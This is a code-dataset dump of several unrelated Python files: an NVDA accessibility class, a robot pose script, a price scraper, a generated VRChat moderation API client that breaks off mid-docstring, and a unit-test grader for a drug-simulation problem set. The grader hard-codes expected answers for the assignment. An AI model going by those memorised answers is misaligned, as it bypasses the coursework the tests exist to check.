id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
3367243 | #NVDAObjects/IAccessible/akelEdit.py
#A part of NonVisual Desktop Access (NVDA)
#Copyright (C) 2010 <NAME> <<EMAIL>>
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
from . import IAccessible
class AkelEdit(IAccessible):
name = ""
| StarcoderdataPython |
3213666 | __version__ = '0.24.0'
| StarcoderdataPython |
3351241 | #!/usr/bin/env python3
#Test suite for Problem Set 4 (Drug Simulation)
import sys
import unittest
import numpy as np
import ps4
population = [[100, 115, 122, 129, 134, 138, 151, 167, 174, 183, 196, 208, 215, 223, 233,
240, 253, 268, 284, 294, 306, 316, 325, 338, 360, 372, 378, 388, 399, 415, 414, 431, 456,
477, 485, 493, 510, 530, 547, 569, 575, 580, 579, 588, 597, 605, 625, 626, 632, 640, 653,
660, 668, 681, 685, 690, 695, 691, 693, 689, 696, 706, 720, 717, 718, 713, 720, 723, 726,
731, 728, 721, 727, 731, 734, 741, 751, 748, 750, 750, 752, 752, 745, 753, 752, 756, 753,
745, 747, 747, 750, 745, 751, 759, 753, 754, 762, 765, 754, 764, 767, 769, 770, 775, 784,
787, 789, 786, 783, 773, 770, 764, 764, 767, 767, 768, 765, 765, 750, 753, 745, 745, 746,
753, 754, 763, 767, 777, 778, 784, 782, 782, 783, 788, 790, 782, 786, 792, 799, 792, 779,
778, 768, 768, 768, 775, 774, 783, 782, 778, 778, 789, 771, 775, 770, 780, 778, 780, 771,
765, 762, 758, 768, 762, 777, 774, 776, 779, 771, 768, 781, 783, 793, 801, 803, 798, 794,
798, 799, 801, 804, 802, 807, 795, 776, 773, 779, 775, 777, 783, 791, 787, 778, 782, 789,
782, 773, 775, 782, 779, 778, 774, 776, 782, 770, 773, 775, 772, 777, 772, 772, 774, 771,
760, 764, 766, 758, 759, 758, 745, 744, 754, 760, 770, 765, 764, 754, 769, 760, 762, 762,
765, 754, 762, 762, 764, 757, 762, 759, 758, 748, 752, 764, 758, 762, 761, 755, 747, 746,
744, 750, 748, 746, 756, 762, 758, 754, 758, 754, 747, 750, 752, 744, 741, 744, 756, 768,
773, 772, 768, 764, 762, 754, 761, 760, 749, 746, 744, 741, 748, 745, 751, 753, 744, 736,
746, 749, 749, 762, 756, 762, 762, 756, 761, 762, 762, 755, 763, 772, 761], [100, 113, 125,
129, 136, 151, 166, 177, 186, 196, 208, 215, 219, 235, 239, 257, 270, 288, 299, 310, 322, 335,
344, 354, 375, 395, 408, 429, 446, 451, 471, 497, 515, 528, 525, 542, 558, 567, 580, 593, 604,
613, 619, 628, 631, 645, 656, 676, 676, 685, 704, 711, 715, 724, 724, 725, 725, 725, 740, 737,
736, 752, 757, 759, 762, 762, 771, 759, 755, 754, 752, 752, 755, 765, 766, 766, 761, 766, 761,
752, 755, 756, 765, 769, 768, 770, 769, 772, 766, 770, 771, 773, 782, 771, 768, 767, 769, 781,
779, 780, 775, 772, 761, 759, 760, 762, 761, 763, 756, 758, 766, 759, 748, 751, 750, 750, 761,
756, 767, 776, 780, 780, 767, 762, 759, 760, 757, 761, 766, 770, 757, 758, 763, 759, 754, 746,
754, 760, 755, 758, 757, 769, 773, 773, 764, 770, 770, 770, 774, 768, 775, 779, 779, 769, 766,
766, 769, 759, 749, 756, 776, 770, 771, 761, 765, 766, 771, 783, 782, 774, 774, 771, 765, 753,
767, 770, 771, 769, 770, 767, 764, 757, 763, 769, 766, 767, 776, 773, 771, 775, 771, 776, 767,
756, 760, 764, 757, 753, 745, 745, 759, 751, 752, 749, 740, 748, 740, 740, 742, 740, 737, 744,
739, 744, 750, 753, 751, 750, 764, 775, 759, 762, 767, 772, 774, 781, 776, 772, 778, 785, 771,
762, 757, 752, 747, 754, 757, 757, 763, 766, 765, 758, 762, 760, 757, 765, 769, 764, 761, 762,
764, 762, 751, 752, 747, 747, 750, 752, 765, 771, 766, 765, 755, 751, 750, 743, 749, 750, 743,
752, 749, 736, 750, 749, 746, 754, 744, 743, 730, 730, 719, 721, 724, 731, 732, 735, 746, 740,
741, 750, 750, 740, 738, 741, 734, 728, 745, 740, 732, 738], [100, 112, 117, 130, 139, 149,
156, 169, 172, 189, 200, 216, 223, 233, 247, 257, 268, 280, 292, 302, 308, 323, 338, 346, 359,
379, 388, 390, 410, 427, 447, 462, 469, 485, 499, 521, 536, 548, 557, 555, 566, 571, 577, 580,
592, 607, 612, 620, 628, 629, 629, 635, 647, 657, 661, 672, 689, 694, 697, 713, 715, 720, 724,
734, 746, 749, 736, 740, 752, 763, 759, 751, 753, 749, 741, 743, 750, 751, 758, 769, 775, 784,
784, 786, 789, 790, 798, 800, 794, 802, 796, 801, 803, 791, 795, 785, 779, 768, 758, 752, 753,
749, 759, 763, 754, 754, 753, 761, 772, 765, 768, 769, 771, 772, 768, 766, 764, 761, 770, 771,
773, 771, 768, 760, 756, 759, 755, 763, 758, 753, 757, 756, 764, 765, 763, 768, 770, 776, 776,
776, 778, 765, 769, 760, 763, 759, 770, 772, 778, 768, 777, 779, 782, 777, 774, 783, 776, 771,
775, 766, 769, 767, 763, 759, 749, 751, 746, 747, 746, 740, 743, 749, 757, 750, 752, 762, 768,
771, 769, 779, 775, 779, 772, 777, 785, 784, 782, 793, 784, 786, 788, 780, 781, 779, 773, 778,
780, 774, 766, 767, 765, 764, 766, 770, 765, 776, 785, 785, 792, 788, 786, 790, 785, 788, 793,
793, 788, 792, 789, 774, 775, 769, 770, 770, 773, 775, 770, 769, 763, 758, 766, 776, 776, 776,
778, 771, 775, 777, 776, 770, 773, 767, 761, 765, 762, 770, 772, 775, 781, 779, 767, 766, 767,
763, 763, 755, 753, 751, 758, 761, 764, 771, 772, 762, 764, 758, 756, 754, 752, 752, 748, 753,
763, 766, 766, 758, 756, 752, 759, 753, 749, 754, 751, 750, 751, 749, 751, 747, 751, 753, 739,
747, 745, 747, 748, 746, 755, 755, 760, 766], [100, 106, 113, 111, 117, 124, 136, 139, 152,
154, 161, 168, 176, 182, 194, 210, 226, 239, 256, 274, 287, 297, 314, 329, 343, 355, 356, 362,
376, 394, 405, 421, 432, 448, 471, 497, 508, 520, 525, 530, 538, 560, 576, 595, 604, 619, 635,
654, 656, 672, 683, 683, 692, 705, 704, 706, 705, 703, 710, 710, 714, 712, 722, 736, 737, 730,
727, 735, 734, 743, 752, 757, 751, 755, 769, 764, 769, 763, 764, 767, 762, 753, 744, 751, 741,
733, 733, 729, 734, 733, 745, 748, 750, 751, 746, 755, 751, 754, 755, 750, 753, 752, 754, 757,
760, 767, 768, 761, 763, 752, 748, 747, 747, 749, 765, 771, 774, 765, 763, 760, 758, 756, 754,
752, 736, 744, 751, 760, 757, 756, 755, 773, 775, 769, 765, 768, 773, 779, 771, 778, 765, 766,
760, 754, 746, 747, 749, 756, 757, 757, 761, 758, 746, 739, 745, 748, 756, 764, 765, 772, 776,
778, 772, 780, 777, 772, 763, 764, 771, 777, 776, 775, 780, 769, 770, 765, 759, 761, 758, 762,
759, 766, 774, 769, 769, 770, 773, 773, 777, 770, 770, 769, 761, 760, 767, 766, 765, 762, 758,
763, 760, 767, 760, 761, 762, 766, 765, 778, 776, 782, 773, 770, 782, 778, 776, 770, 767, 766,
755, 756, 753, 747, 744, 759, 760, 742, 746, 744, 748, 762, 759, 762, 770, 774, 784, 773, 763,
749, 742, 747, 731, 728, 731, 736, 745, 743, 737, 736, 736, 739, 739, 743, 740, 748, 760, 754,
757, 765, 772, 766, 767, 764, 751, 750, 750, 750, 753, 763, 767, 762, 765, 768, 774, 770, 768,
766, 765, 752, 745, 749, 751, 750, 750, 753, 747, 755, 762, 762, 770, 762, 756, 754, 754, 757,
763, 760, 752, 753, 765, 770], [100, 109, 121, 127, 135, 146, 150, 160, 167, 180, 196, 206,
226, 244, 254, 263, 277, 303, 310, 321, 325, 342, 356, 372, 383, 394, 407, 418, 422, 430, 459,
477, 485, 504, 517, 518, 520, 532, 542, 558, 574, 594, 607, 602, 606, 615, 628, 636, 654, 660,
656, 660, 662, 673, 684, 686, 698, 714, 715, 723, 727, 739, 736, 733, 741, 744, 744, 742, 751,
757, 758, 753, 754, 755, 758, 757, 763, 757, 754, 743, 740, 738, 739, 740, 739, 745, 739, 741,
736, 726, 737, 737, 740, 749, 750, 756, 754, 761, 774, 783, 781, 781, 773, 759, 754, 752, 754,
761, 749, 740, 739, 732, 727, 730, 744, 753, 763, 753, 752, 753, 761, 759, 759, 753, 743, 749,
743, 730, 734, 735, 737, 748, 756, 760, 754, 752, 758, 756, 758, 758, 764, 754, 756, 750, 759,
755, 759, 756, 752, 759, 761, 758, 750, 750, 756, 760, 764, 761, 764, 769, 761, 764, 761, 756,
749, 754, 768, 752, 749, 757, 751, 744, 752, 756, 753, 767, 770, 770, 762, 747, 749, 750, 747,
750, 748, 744, 750, 748, 742, 740, 741, 742, 750, 757, 750, 758, 755, 755, 745, 732, 728, 726,
735, 745, 752, 747, 752, 753, 747, 756, 748, 748, 751, 753, 747, 749, 756, 760, 761, 757, 756,
759, 753, 743, 751, 749, 756, 760, 774, 770, 780, 780, 775, 769, 756, 759, 761, 767, 774, 773,
770, 768, 773, 770, 765, 771, 759, 758, 753, 747, 739, 740, 741, 744, 741, 736, 743, 731, 740,
735, 736, 738, 734, 739, 736, 731, 732, 730, 730, 733, 730, 726, 735, 745, 745, 749, 747, 747,
750, 755, 754, 747, 762, 761, 764, 773, 769, 771, 771, 767, 761, 756, 753, 746, 757, 755, 756,
766, 759, 764], [100, 107, 112, 113, 124, 131, 134, 137, 148, 160, 174, 190, 201, 216, 225,
237, 246, 253, 259, 270, 277, 287, 305, 327, 351, 375, 381, 400, 425, 431, 454, 474, 493, 505,
523, 525, 536, 547, 559, 570, 579, 578, 588, 590, 609, 611, 620, 623, 631, 634, 640, 640, 642,
641, 657, 670, 672, 678, 683, 696, 700, 710, 717, 728, 725, 720, 722, 725, 730, 722, 725, 722,
732, 727, 732, 733, 732, 733, 743, 739, 747, 737, 737, 739, 745, 749, 748, 753, 738, 739, 742,
741, 748, 753, 761, 762, 761, 763, 770, 765, 755, 751, 750, 747, 757, 760, 771, 773, 772, 769,
777, 763, 762, 757, 759, 754, 750, 752, 753, 759, 762, 767, 759, 765, 771, 762, 764, 759, 763,
770, 768, 766, 754, 745, 747, 732, 719, 728, 733, 734, 731, 739, 744, 750, 753, 760, 763, 772,
775, 760, 764, 773, 777, 773, 766, 772, 775, 777, 779, 775, 784, 783, 772, 772, 764, 762, 759,
756, 768, 764, 768, 758, 754, 756, 755, 751, 752, 753, 762, 766, 768, 769, 779, 783, 785, 783,
785, 784, 782, 787, 787, 783, 788, 787, 787, 796, 786, 783, 791, 773, 786, 786, 792, 785, 788,
791, 785, 781, 784, 773, 777, 765, 772, 779, 770, 763, 755, 765, 764, 756, 755, 755, 749, 750,
746, 744, 758, 759, 760, 770, 772, 762, 757, 754, 752, 741, 740, 747, 754, 753, 762, 765, 761,
758, 759, 759, 770, 770, 757, 756, 767, 767, 766, 763, 765, 769, 771, 783, 796, 799, 797, 803,
802, 788, 789, 789, 794, 791, 796, 795, 795, 792, 781, 780, 783, 775, 772, 769, 763, 773, 771,
773, 772, 764, 758, 759, 760, 764, 753, 763, 768, 766, 760, 757, 756, 761, 760, 760, 753, 755],
[100, 107, 113, 118, 124, 136, 140, 157, 165, 172, 182, 195, 201, 209, 214, 226, 236, 250, 256,
273, 288, 292, 306, 313, 325, 333, 347, 369, 388, 406, 423, 436, 453, 456, 472, 484, 490, 514,
524, 539, 553, 565, 580, 580, 590, 594, 603, 618, 622, 620, 635, 637, 646, 653, 654, 654, 661,
674, 679, 690, 699, 697, 694, 705, 695, 705, 707, 712, 718, 727, 728, 735, 730, 730, 729, 732,
724, 720, 727, 743, 748, 752, 759, 760, 765, 759, 752, 756, 746, 745, 732, 734, 741, 741, 747,
746, 737, 737, 733, 734, 734, 732, 743, 748, 746, 746, 752, 762, 767, 773, 775, 760, 754, 767,
766, 761, 753, 762, 768, 766, 762, 771, 775, 781, 779, 778, 785, 786, 791, 791, 792, 794, 782,
777, 780, 782, 785, 800, 803, 807, 802, 800, 800, 793, 793, 792, 788, 783, 785, 785, 791, 782,
774, 784, 792, 788, 795, 802, 791, 781, 776, 783, 783, 779, 778, 785, 787, 780, 780, 785, 792,
798, 790, 783, 783, 789, 789, 784, 770, 774, 777, 774, 777, 779, 776, 772, 764, 761, 762, 765,
767, 769, 763, 763, 757, 754, 756, 751, 745, 749, 743, 741, 752, 759, 758, 748, 747, 749, 747,
752, 756, 755, 753, 753, 743, 752, 741, 746, 743, 744, 729, 732, 735, 731, 740, 746, 742, 753,
754, 754, 756, 757, 765, 767, 763, 772, 777, 787, 797, 789, 780, 779, 770, 767, 757, 764, 767,
767, 767, 767, 767, 760, 752, 749, 751, 755, 758, 764, 760, 768, 777, 772, 768, 765, 776, 770,
769, 774, 769, 760, 764, 764, 756, 747, 756, 755, 759, 759, 770, 756, 751, 749, 756, 753, 761,
757, 768, 766, 758, 760, 778, 781, 773, 784, 791, 784, 779, 778, 775, 776], [100,
108, 114, 123, 131, 137, 145, 152, 157, 168, 175, 192, 209, 212, 220, 236, 248, 258, 264, 268,
282, 295, 300, 323, 331, 339, 355, 367, 385, 407, 414, 435, 449, 447, 470, 481, 484, 494, 509,
519, 530, 541, 551, 564, 570, 578, 587, 596, 594, 597, 613, 631, 641, 647, 656, 661, 677, 691,
700, 708, 717, 721, 722, 727, 725, 725, 726, 728, 730, 730, 726, 731, 728, 741, 734, 733, 733,
735, 716, 722, 728, 729, 730, 732, 720, 716, 710, 719, 723, 724, 730, 724, 738, 740, 743, 748,
755, 755, 758, 763, 758, 752, 755, 760, 757, 768, 770, 766, 763, 764, 755, 756, 752, 746, 750,
751, 754, 748, 755, 754, 752, 768, 759, 761, 766, 757, 767, 758, 757, 742, 750, 762, 754, 764,
760, 756, 762, 772, 778, 776, 772, 774, 771, 754, 773, 776, 773, 766, 769, 769, 770, 771, 769,
772, 770, 774, 774, 777, 782, 769, 762, 760, 760, 777, 783, 785, 789, 779, 776, 783, 791, 792,
801, 787, 781, 774, 770, 774, 773, 770, 767, 766, 761, 761, 764, 754, 749, 746, 748, 752, 750,
751, 755, 763, 756, 757, 763, 774, 773, 774, 776, 775, 777, 773, 783, 791, 780, 784, 775, 769,
774, 779, 782, 786, 792, 783, 793, 791, 778, 781, 779, 779, 778, 785, 778, 779, 773, 772, 768,
780, 777, 768, 776, 769, 776, 771, 768, 765, 766, 766, 764, 753, 752, 750, 749, 748, 749, 752,
760, 763, 749, 754, 753, 752, 749, 748, 747, 751, 742, 739, 731, 728, 728, 725, 712, 718, 716,
722, 724, 723, 736, 735, 747, 746, 746, 740, 739, 743, 742, 749, 742, 753, 752, 752, 752, 754,
764, 761, 766, 775, 773, 764, 771, 761, 762, 749, 745, 748, 754, 754], [100, 109, 120, 123,
128, 134, 138, 149, 153, 161, 173, 183, 200, 209, 216, 221, 235, 240, 247, 249, 259, 268, 285,
293, 311, 326, 360, 383, 400, 420, 434, 448, 467, 476, 488, 494, 511, 529, 542, 559, 561, 580,
592, 606, 613, 624, 641, 651, 661, 669, 670, 677, 668, 677, 677, 682, 684, 697, 692, 699, 700,
704, 704, 707, 714, 717, 720, 718, 716, 719, 718, 727, 725, 720, 730, 740, 747, 749, 754, 759,
763, 763, 763, 761, 768, 766, 762, 752, 750, 745, 750, 752, 759, 766, 764, 754, 756, 752, 766,
771, 772, 784, 786, 793, 776, 772, 774, 765, 762, 756, 755, 763, 766, 770, 774, 759, 769, 768,
768, 764, 767, 765, 755, 756, 767, 768, 762, 763, 764, 756, 757, 753, 760, 755, 774, 769, 772,
763, 763, 759, 755, 747, 756, 749, 746, 744, 752, 750, 754, 754, 763, 753, 757, 749, 758, 761,
757, 754, 745, 743, 739, 739, 745, 745, 741, 751, 740, 743, 735, 731, 737, 736, 731, 731, 725,
721, 721, 723, 735, 734, 735, 747, 755, 755, 745, 729, 737, 739, 734, 730, 737, 744, 741, 746,
742, 763, 760, 759, 769, 764, 767, 759, 757, 765, 762, 753, 760, 770, 761, 762, 763, 759, 770,
761, 759, 750, 741, 739, 739, 750, 755, 755, 757, 753, 753, 751, 753, 761, 760, 764, 765, 773,
770, 771, 765, 773, 781, 776, 769, 768, 762, 765, 760, 766, 763, 757, 750, 763, 761, 761, 764,
764, 759, 765, 762, 756, 755, 764, 750, 754, 759, 759, 755, 764, 771, 788, 779, 774, 772, 771,
779, 773, 770, 773, 780, 783, 782, 768, 768, 766, 762, 758, 758, 754, 742, 734, 740, 740, 736,
729, 745, 746, 751, 760, 763, 774, 776, 771, 774, 766], [100, 112, 117, 127, 133, 145, 158, 169,
174, 182, 190, 210, 225, 236, 243, 257, 272, 284, 298, 308, 318, 339, 353, 368, 375, 385, 405,
413, 427, 438, 447, 464, 477, 494, 501, 506, 527, 529, 537, 556, 566, 574, 592, 599, 606, 601,
612, 632, 631, 642, 651, 659, 664, 664, 670, 682, 683, 681, 677, 667, 668, 680, 698, 713, 717,
718, 720, 724, 724, 736, 734, 735, 748, 747, 755, 752, 752, 743, 746, 754, 757, 749, 750, 751,
750, 754, 758, 754, 758, 756, 749, 747, 759, 765, 767, 758, 747, 738, 749, 763, 770, 773, 755,
749, 758, 756, 750, 758, 748, 749, 750, 752, 744, 746, 751, 758, 754, 757, 758, 756, 755, 757,
761, 766, 768, 760, 758, 757, 749, 753, 761, 761, 752, 755, 750, 746, 747, 751, 755, 748, 749,
742, 732, 743, 738, 742, 750, 750, 750, 747, 752, 748, 741, 735, 746, 753, 763, 766, 765, 769,
777, 766, 766, 766, 765, 757, 747, 740, 722, 718, 723, 732, 742, 740, 747, 747, 746, 730, 731,
725, 717, 727, 726, 730, 734, 737, 728, 734, 727, 729, 731, 727, 741, 749, 754, 758, 767, 767,
768, 763, 765, 774, 776, 786, 783, 777, 776, 778, 786, 784, 787, 778, 770, 772, 780, 783, 777,
774, 765, 769, 763, 765, 766, 764, 763, 770, 770, 773, 784, 773, 768, 765, 761, 769, 760, 764,
765, 770, 761, 770, 768, 765, 760, 774, 767, 762, 764, 756, 755, 756, 759, 752, 751, 748, 753,
748, 742, 746, 741, 740, 735, 745, 750, 752, 749, 744, 744, 753, 745, 743, 747, 746, 750, 754,
753, 747, 751, 752, 753, 752, 755, 751, 759, 752, 748, 746, 751, 756, 749, 753, 753, 757, 755,
765, 767, 767, 767, 770, 768, 775]]
class ps4_calc(unittest.TestCase):
def test_calc_pop_avg(self):
avg = 762.5
calc_avg = ps4.calc_pop_avg(population, 299)
print(calc_avg)
self.assertTrue(avg-1 < calc_avg < avg+1,
"Got incorrect population average {} instead of {}.".format(calc_avg, avg))
def test_calc_pop_std(self):
std = 10.735455276791944
calc_std = ps4.calc_pop_std(population, 299)
print(calc_std)
self.assertTrue(std -0.1 < calc_std < std + 0.1,
"Got incorrect population standard deviation {} instead of {}.".format(calc_std, std))
def test_calc_95_ci(self):
ci_95 = 6.6539041171330382
calc_avg, calc_ci_95 = ps4.calc_95_ci(population, 299)
print(calc_ci_95)
self.assertTrue(ci_95 - 0.1 < calc_ci_95 < ci_95 + 0.1,
"Got incorrect population 95% CI {} instead of {}.".format(calc_ci_95, ci_95))
class ps4_classes(unittest.TestCase):
def test_simpleBacteria_is_killed(self):
b1 = ps4.SimpleBacteria(0.0, 1.0)
b2 = ps4.SimpleBacteria(1.0, 0.0)
self.assertTrue(b1.is_killed(),
'Expected SimpleBacteria(0.0, 1.0) to be killed with is_killed()')
self.assertFalse(b2.is_killed(),
'Expected SimpleBacteria(1.0, 0.0) to be survive with is_killed()')
def test_simpleBacteria_reproduce(self):
b1 = ps4.SimpleBacteria(0.0, 1.0)
b2 = ps4.SimpleBacteria(1.0, 0.0)
with self.assertRaises(ps4.NoChildException):
b1.reproduce(0)
with self.assertRaises(ps4.NoChildException):
b2.reproduce(1)
offspring_b = b2.reproduce(0)
self.assertIs(type(offspring_b), ps4.SimpleBacteria, 'offspring should be a SimpleBacteria')
self.assertEqual(offspring_b.birth_prob, 1.0)
self.assertEqual(offspring_b.death_prob, 0.0)
class test_functions(unittest.TestCase):
def test_calc_pop_avg(self):
population = [[1, 2, 3],[2, 5, 9],[6, 7, 10]]
self.assertEqual(ps4.calc_pop_avg(population, 0), 2 , 'expected 2')
self.assertEqual(ps4.calc_pop_avg(population, 1), 16/3, 'expected 5 1/3')
self.assertEqual(ps4.calc_pop_avg(population, 2), 23/3, 'expected 7 2/3')
populations = np.array([[1, 2, 3], [10, 20, 30]])
self.assertEqual(ps4.calc_pop_avg(populations, 0), 2)
self.assertEqual(ps4.calc_pop_avg(populations, 1), 20)
if __name__ == "__main__":
suite = unittest.TestSuite()
# suite.addTest(unittest.makeSuite(ps4_calc))
suite.addTest(unittest.makeSuite(ps4_classes))
suite.addTest(unittest.makeSuite(test_functions))
unittest.TextTestRunner(verbosity=3).run(suite)
| StarcoderdataPython |
189170 | def relax():
neopixel.setAnimation("Color Wipe", 0, 0, 20, 1)
sleep(2)
neopixel.setAnimation("Ironman", 0, 0, 255, 1)
if (i01.eyesTracking.getOpenCV().capturing):
global MoveBodyRandom
MoveBodyRandom=0
global MoveHeadRandom
MoveHeadRandom=0
i01.setHandSpeed("left", 0.85, 0.85, 0.85, 0.85, 0.85, 0.85)
i01.setHandSpeed("right", 0.85, 0.85, 0.85, 0.85, 0.85, 0.85)
i01.setArmSpeed("right", 0.75, 0.85, 0.65, 0.85)
i01.setArmSpeed("left", 0.95, 0.65, 0.75, 0.75)
i01.setHeadSpeed(0.85, 0.85)
i01.setTorsoSpeed(0.75, 0.55, 1.0)
i01.moveHead(79,100)
i01.moveArm("left",5,84,28,14)
i01.moveArm("right",5,82,28,16)
i01.moveHand("left",92,33,37,71,66,25)
i01.moveHand("right",81,66,82,60,105,113)
i01.moveTorso(95,90,90)
else:
global MoveBodyRandom
MoveBodyRandom=1
global MoveHeadRandom
MoveHeadRandom=1
i01.setHandSpeed("left", 0.85, 0.85, 0.85, 0.85, 0.85, 0.85)
i01.setHandSpeed("right", 0.85, 0.85, 0.85, 0.85, 0.85, 0.85)
i01.setArmSpeed("right", 0.75, 0.85, 0.65, 0.85)
i01.setArmSpeed("left", 0.95, 0.65, 0.75, 0.75)
i01.setHeadSpeed(0.85, 0.85)
i01.setTorsoSpeed(0.75, 0.55, 1.0)
#i01.moveHead(79,100)
i01.moveArm("left",5,84,28,14)
i01.moveArm("right",5,82,28,16)
i01.moveHand("left",92,33,37,71,66,25)
i01.moveHand("right",81,66,82,60,105,113)
i01.moveTorso(95,90,90)
| StarcoderdataPython |
1643177 | <filename>src/papaprice/etmall.py
import re
import requests
import json
import js2py
from bs4 import BeautifulSoup as bs
from papaprice.papaprice import PapaPrice
class Etmall(PapaPrice):
def __init__(self, proxies = None):
super().__init__(proxies)
self.url_template = 'https://www.etmall.com.tw/i/{}'
def _parse(self, response):
name = None
price = None
soup = bs(response.text, 'html.parser')
script = soup.find('script', string = re.compile("'ViewContent'")).string
script = script.replace('\r',' ').replace('\n',' ')
content = re.search("(?<='ViewContent',)[^}]+}",script)[0]
js = js2py.eval_js('js=' + content)
name = js['content_name']
price = js['value']
return name, price
| StarcoderdataPython |
1616371 | <gh_stars>1-10
"""
VRChat API Documentation
The version of the OpenAPI document: 1.6.8
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from vrchatapi.api_client import ApiClient, Endpoint as _Endpoint
from vrchatapi.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from vrchatapi.model.error import Error
from vrchatapi.model.moderate_user_request import ModerateUserRequest
from vrchatapi.model.player_moderation import PlayerModeration
from vrchatapi.model.success import Success
class PlayermoderationApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.clear_all_player_moderations_endpoint = _Endpoint(
settings={
'response_type': (Success,),
'auth': [
'apiKeyCookie',
'authCookie'
],
'endpoint_path': '/auth/user/playermoderations',
'operation_id': 'clear_all_player_moderations',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.delete_player_moderation_endpoint = _Endpoint(
settings={
'response_type': (Success,),
'auth': [
'apiKeyCookie',
'authCookie'
],
'endpoint_path': '/auth/user/playermoderations/{playerModerationId}',
'operation_id': 'delete_player_moderation',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'player_moderation_id',
],
'required': [
'player_moderation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'player_moderation_id':
(str,),
},
'attribute_map': {
'player_moderation_id': 'playerModerationId',
},
'location_map': {
'player_moderation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_player_moderation_endpoint = _Endpoint(
settings={
'response_type': (PlayerModeration,),
'auth': [
'apiKeyCookie',
'authCookie'
],
'endpoint_path': '/auth/user/playermoderations/{playerModerationId}',
'operation_id': 'get_player_moderation',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'player_moderation_id',
],
'required': [
'player_moderation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'player_moderation_id':
(str,),
},
'attribute_map': {
'player_moderation_id': 'playerModerationId',
},
'location_map': {
'player_moderation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_player_moderations_endpoint = _Endpoint(
settings={
'response_type': ([PlayerModeration],),
'auth': [
'apiKeyCookie',
'authCookie'
],
'endpoint_path': '/auth/user/playermoderations',
'operation_id': 'get_player_moderations',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'type',
'target_user_id',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'type':
(str,),
'target_user_id':
(str,),
},
'attribute_map': {
'type': 'type',
'target_user_id': 'targetUserId',
},
'location_map': {
'type': 'query',
'target_user_id': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.moderate_user_endpoint = _Endpoint(
settings={
'response_type': (PlayerModeration,),
'auth': [
'apiKeyCookie',
'authCookie'
],
'endpoint_path': '/auth/user/playermoderations',
'operation_id': 'moderate_user',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moderate_user_request',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moderate_user_request':
(ModerateUserRequest,),
},
'attribute_map': {
},
'location_map': {
'moderate_user_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.unmoderate_user_endpoint = _Endpoint(
settings={
'response_type': (Success,),
'auth': [
'apiKeyCookie',
'authCookie'
],
'endpoint_path': '/auth/user/unplayermoderate',
'operation_id': 'unmoderate_user',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'moderate_user_request',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moderate_user_request':
(ModerateUserRequest,),
},
'attribute_map': {
},
'location_map': {
'moderate_user_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
def clear_all_player_moderations(
self,
**kwargs
):
"""Clear All Player Moderations # noqa: E501
⚠️ **This will delete every single player moderation you've ever made.** # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.clear_all_player_moderations(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Success
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.clear_all_player_moderations_endpoint.call_with_http_info(**kwargs)
def delete_player_moderation(
self,
player_moderation_id,
**kwargs
):
"""Delete Player Moderation # noqa: E501
Deletes a specific player moderation based on it's `pmod_` ID. The website uses `unmoderateUser` instead. You can delete the same player moderation multiple times successfully. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
